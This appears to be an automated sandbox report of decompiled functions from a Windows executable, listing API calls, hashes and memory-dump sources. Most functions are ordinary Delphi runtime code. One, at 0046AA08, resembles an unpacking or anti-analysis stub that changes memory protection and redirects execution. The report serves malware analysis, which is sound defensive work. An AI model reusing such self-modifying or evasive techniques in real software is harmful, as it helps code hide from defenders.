                                                                                • Opcode Fuzzy Hash: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction Fuzzy Hash: A431D9B06002419FD740EF2AD8C1B997BE4AB0535AF44C07EED18DF3A6D779A908CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042626C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E0042626C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x487abc == 0) {
					 *0x487a94 = E00426184(0, _t8,  *0x487a94, _t17, _t18);
					_t7 =  *0x487a94(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                                0x00426270
                                                                                0x0042627a
                                                                                0x0042628e
                                                                                0x00426294
                                                                                0x00000000
                                                                                0x00426294
                                                                                0x0042629c
                                                                                0x004262a4
                                                                                0x004262a4
                                                                                0x004262a7
                                                                                0x004262bb
                                                                                0x004262a9
                                                                                0x004262a9
                                                                                0x004262bf
                                                                                0x004262ab
                                                                                0x004262ab
                                                                                0x004262ab
                                                                                0x004262ac
                                                                                0x004262c3
                                                                                0x004262ae
                                                                                0x004262af
                                                                                0x004262b2
                                                                                0x004262b4
                                                                                0x004262b4
                                                                                0x004262b2
                                                                                0x004262ac
                                                                                0x004262a9
                                                                                0x004262c8
                                                                                0x004262cb
                                                                                0x004262d5
                                                                                0x004262cd
                                                                                0x00000000
                                                                                0x004262ce

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 004262CE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 00426294
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                • String ID: GetSystemMetrics
                                                                                • API String ID: 54681038-96882338
                                                                                • Opcode ID: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction ID: 880e1060c297ee59ad63230c10489d7c0a575417c52aad937f933fdb4636618d
                                                                                • Opcode Fuzzy Hash: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction Fuzzy Hash: 1CF0C230718120CADA006A74BD8472B3A4A9B42320BE38FA7E521866D1C53C9905433D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453354, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453354(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x46bbb4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x487714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045340C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                                0x00453358
                                                                                0x00453366
                                                                                0x00453369
                                                                                0x0045336e
                                                                                0x00453373
                                                                                0x00453376
                                                                                0x00453380
                                                                                0x0045338a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453390
                                                                                0x0045339b
                                                                                0x004533a0
                                                                                0x004533a1
                                                                                0x004533a4
                                                                                0x004533ad

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CursorLoad
                                                                                • String ID:
                                                                                • API String ID: 3238433803-0
                                                                                • Opcode ID: 970608c962dfe9579670997007ca9dfd727f28781e592547f57f766a683e145f
                                                                                • Instruction ID: b1caf607b14ff593e9217e7f127a1446ae7340b5e4665508d0a3cfd9e6c96b03
                                                                                • Opcode Fuzzy Hash: 970608c962dfe9579670997007ca9dfd727f28781e592547f57f766a683e145f
                                                                                • Instruction Fuzzy Hash: A0F0822170020457D620197E5CC0D2EB684DB817B7B21037BFD3ACB2E2CF29AE4642A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401590(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401444(0x4875e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                0x00401593
                                                                                0x0040159d
                                                                                0x004015ac
                                                                                0x0040159f
                                                                                0x0040159f
                                                                                0x0040159f
                                                                                0x004015b2
                                                                                0x004015bf
                                                                                0x004015c4
                                                                                0x004015c6
                                                                                0x004015ca
                                                                                0x004015d3
                                                                                0x004015da
                                                                                0x004015e6
                                                                                0x004015ed
                                                                                0x00000000
                                                                                0x004015ed
                                                                                0x004015da
                                                                                0x004015f2

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015BF
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401899), ref: 004015E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 07daf6b8937cae355694799808fb6db99fa22e5180326d9c3c24eb0050f15955
                                                                                • Instruction ID: 7ee7b2b378d9b21af57a504837b06affff0a11b55aa281933ae50cd2cee7ebd5
                                                                                • Opcode Fuzzy Hash: 07daf6b8937cae355694799808fb6db99fa22e5180326d9c3c24eb0050f15955
                                                                                • Instruction Fuzzy Hash: F4F02772F002202BEB20696A4CC1F4366C59FC5790F180177FA08FF3E9D6798C0043A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046AA08, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0046AA08(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E0046A9D0( *((intOrPtr*)( *_t31))) == 0) {
					if(E0046A9FC( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x46a9bc;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa0) ^ 0x00019b81) != 0x5ecca) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa4), 0x1465f, 4,  &_v8); // executed
				E0046AAF8(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa4)), 0x1465f, __edi, __esi, 0x1acd9, 0x46bd08);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x40a3;
				return _t29 | 0xffffffff;
			}









                                                                                0x0046aa0d
                                                                                0x0046aa1b
                                                                                0x0046aa8d
                                                                                0x00000000
                                                                                0x0046aaa2
                                                                                0x0046aa97
                                                                                0x00000000
                                                                                0x0046aa9d
                                                                                0x0046aa1d
                                                                                0x0046aa32
                                                                                0x00000000
                                                                                0x0046aa7e
                                                                                0x0046aa48
                                                                                0x0046aa67
                                                                                0x0046aa6c
                                                                                0x0046aa6f
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0046A9D0: GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                  • Part of subcall function 0046A9D0: ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                • VirtualProtectEx.KERNEL32(000000FF,?,0001465F,00000004,?), ref: 0046AA48
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ExitProcessProtectSystemTimeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1291046601-0
                                                                                • Opcode ID: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction ID: 933bd6c47300b109d5fd9173ba739c1b5b1a8afb3f7ecdb2f71907d76ff0079e
                                                                                • Opcode Fuzzy Hash: 5b2a46624185d581ea21671ad217231ed216d584df6c4e5170e27ce6a791d0df
                                                                                • Instruction Fuzzy Hash: 501152742046009FC700DF95C681E6273D5AF4A324F2482A7B628AF396E678EC55CB5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00440BF4, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00440BF4(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x440c7a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x487b6c =  *0x487b6c - 1;
				if( *0x487b6c < 0) {
					 *0x487b68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x487b68;
					E004409C0(_t16, __edi,  *0x487b68);
					_t6 =  *0x431114; // 0x431160
					E004135D4(_t6, _t16, _t17,  *0x487b68);
					_t8 =  *0x431114; // 0x431160
					E00413674(_t8, _t16, _t17, _t31);
					_t21 =  *0x431114; // 0x431160
					_t10 =  *0x442280; // 0x4422cc
					E00413620(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431114; // 0x431160
					_t12 =  *0x440c84; // 0x440cd0
					E00413620(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431114; // 0x431160
					_t14 =  *0x440e38; // 0x440e84
					E00413620(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x440c81);
				return 0;
			}















                                                                                0x00440bf4
                                                                                0x00440bf4
                                                                                0x00440bf9
                                                                                0x00440bfa
                                                                                0x00440bff
                                                                                0x00440c02
                                                                                0x00440c05
                                                                                0x00440c0c
                                                                                0x00440c1c
                                                                                0x00440c1c
                                                                                0x00440c23
                                                                                0x00440c28
                                                                                0x00440c2d
                                                                                0x00440c32
                                                                                0x00440c37
                                                                                0x00440c3c
                                                                                0x00440c42
                                                                                0x00440c47
                                                                                0x00440c4c
                                                                                0x00440c52
                                                                                0x00440c57
                                                                                0x00440c5c
                                                                                0x00440c62
                                                                                0x00440c67
                                                                                0x00440c67
                                                                                0x00440c6e
                                                                                0x00440c71
                                                                                0x00440c74
                                                                                0x00440c79

                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00440C7A), ref: 00440C0E
                                                                                  • Part of subcall function 004409C0: GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                  • Part of subcall function 004409C0: GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                  • Part of subcall function 004409C0: RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004409C0: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                  • Part of subcall function 004409C0: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                • String ID:
                                                                                • API String ID: 3775504709-0
                                                                                • Opcode ID: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction ID: e67370ff2c8a915d09f98d7b992bbfe6c99b42158f3494a24295611e547c08d6
                                                                                • Opcode Fuzzy Hash: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction Fuzzy Hash: 0DF0F6B92041009FE720EF26EE938957795E74A705791053AF60043B72CA7CEC61DB6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407286, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407286(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction ID: 764575f9a061b279fabeaa25adf60532a7347093fa5cbb10b55d8dde51a955d6
                                                                                • Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
                                                                                • Instruction Fuzzy Hash: 7BE0FEB2204209BFEB00DE8ADDC1DABB7ACFB4C654F814115BB1C97242D275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407288, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407288(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                                0x004072b1
                                                                                0x004072b8

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction ID: 3cd20fb1d280f358d9783e880d6765cd3a24c9f6542a4f025d110428a1baabb2
                                                                                • Opcode Fuzzy Hash: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
                                                                                • Instruction Fuzzy Hash: 13E002B2204309BFEB00DE8ADDC1DABB7ACFB4C654F814105BB1C97242C275AC608B75
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405A3C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405C78(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                                0x00405a44
                                                                                0x00405a4a
                                                                                0x00405a56
                                                                                0x00405a5a
                                                                                0x00405a63
                                                                                0x00405a68
                                                                                0x00405a6a
                                                                                0x00405a6f
                                                                                0x00405a71
                                                                                0x00405a74
                                                                                0x00405a74
                                                                                0x00405a6f
                                                                                0x00405a77
                                                                                0x00405a82

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?,00000400,?,004103FC,00413F53,00000000,00413F78), ref: 00405A5A
                                                                                  • Part of subcall function 00405C78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                  • Part of subcall function 00405C78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                  • Part of subcall function 00405C78: RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                  • Part of subcall function 00405C78: RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                • String ID:
                                                                                • API String ID: 2796650324-0
                                                                                • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction ID: eb3007f67f035d8ae6987e39c34b1bfc81debd44418eda91f1e8b5ec37918a95
                                                                                • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction Fuzzy Hash: 7AE03971A006188BCB10DE6888C1A973398AB08754F4006A6AD54EF386D374D9108F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4875e4; // 0x753f04
				while(_t29 != 0x4875e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                0x0040172b
                                                                                0x0040172f
                                                                                0x00401736
                                                                                0x0040174b
                                                                                0x00401753
                                                                                0x00401759
                                                                                0x0040175f
                                                                                0x00401762
                                                                                0x004017a6
                                                                                0x0040176a
                                                                                0x00401770
                                                                                0x00401774
                                                                                0x00401776
                                                                                0x00401776
                                                                                0x0040177c
                                                                                0x0040177e
                                                                                0x0040177e
                                                                                0x00401784
                                                                                0x00401791
                                                                                0x00401798
                                                                                0x0040179a
                                                                                0x004017a0
                                                                                0x00000000
                                                                                0x004017a0
                                                                                0x00401798
                                                                                0x004017a4
                                                                                0x004017a4
                                                                                0x004017b5

                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction ID: 1a5925291fe787c1d48d88209c3eaa4d58d595cd838ba54473f015ce8f777fb7
                                                                                • Opcode Fuzzy Hash: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction Fuzzy Hash: 57117C7AA046019FC3109F29C980A1BB7E5EFC4760F15C63EE598A73A5D639AC408B89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

